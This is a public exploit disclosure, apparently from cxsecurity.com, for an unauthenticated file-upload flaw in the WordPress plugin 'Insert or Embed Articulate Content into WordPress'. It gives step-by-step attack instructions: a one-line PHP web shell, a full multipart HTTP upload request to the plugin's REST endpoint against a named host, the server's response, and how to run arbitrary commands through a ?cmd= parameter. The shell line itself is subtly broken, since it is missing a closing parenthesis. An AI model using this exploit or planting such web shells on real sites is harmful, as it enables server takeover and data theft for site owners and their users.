WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unautorized)

2019.06.23
id Con7ext (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Authorized RCE : https://cxsecurity.com/issue/WLB-2019060137 # Author : Con7ext 1. Create File > index.php / whatever and index.html EX: INDEX.html <html> HELLO WORLD </html> EX: INDEX.php <?php system($_GET[cmd]; ?> 2. Compress it to zip 3. Make Request to /wordpress/index.php/wp-json/articulate/v1/upload-data POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1 Host: movie.boniw.io User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://movie.boniw.io/wordpress/wp-admin/post.php?post=16&action=edit Content-Type: multipart/form-data; boundary=---------------------------57052814523281 Content-Length: 808294 Connection: close -----------------------------57052814523281 Content-Disposition: form-data; name="name" whatever.zip -----------------------------57052814523281 Content-Disposition: form-data; name="chunk" 2 -----------------------------57052814523281 Content-Disposition: form-data; name="chunks" 3 -----------------------------57052814523281 Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream ANY 4. You will see the message like : {"OK": 1, "info": "Upload Complete!", "folder" : "kntl", "path" : "\/wp-content\/uploads\/articulate_uploads\/kntl\/index.html", "name" : {"file_name":"index.html","status":"index_html_file_found"}, "target": "/var/www/html/wordpress/wp-content/uploads/articulate_uploads/kntl"} 5. The you can see site.com/PATH ( site.com/wp-content/uploads/articulate_uploads/kntl/index.php ) 6. The you can run command ( JUST ADDING ?cmd EX: site.com/wp-content/uploads/articulate_uploads/kntl/index.php?cmd={COMMAND} )


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top